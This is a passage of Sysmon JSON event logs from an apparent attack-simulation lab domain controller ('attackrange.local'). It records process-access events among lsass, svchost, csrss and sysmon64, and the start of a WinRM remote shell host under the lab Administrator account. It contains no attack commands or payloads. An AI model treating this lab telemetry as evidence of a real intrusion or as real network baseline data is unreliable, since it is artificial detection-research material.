06:55:16.978","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.985\r\nProcessGuid: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nProcessId: 3140\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.985","ProcessGuid":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nTargetProcessId: 3140\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
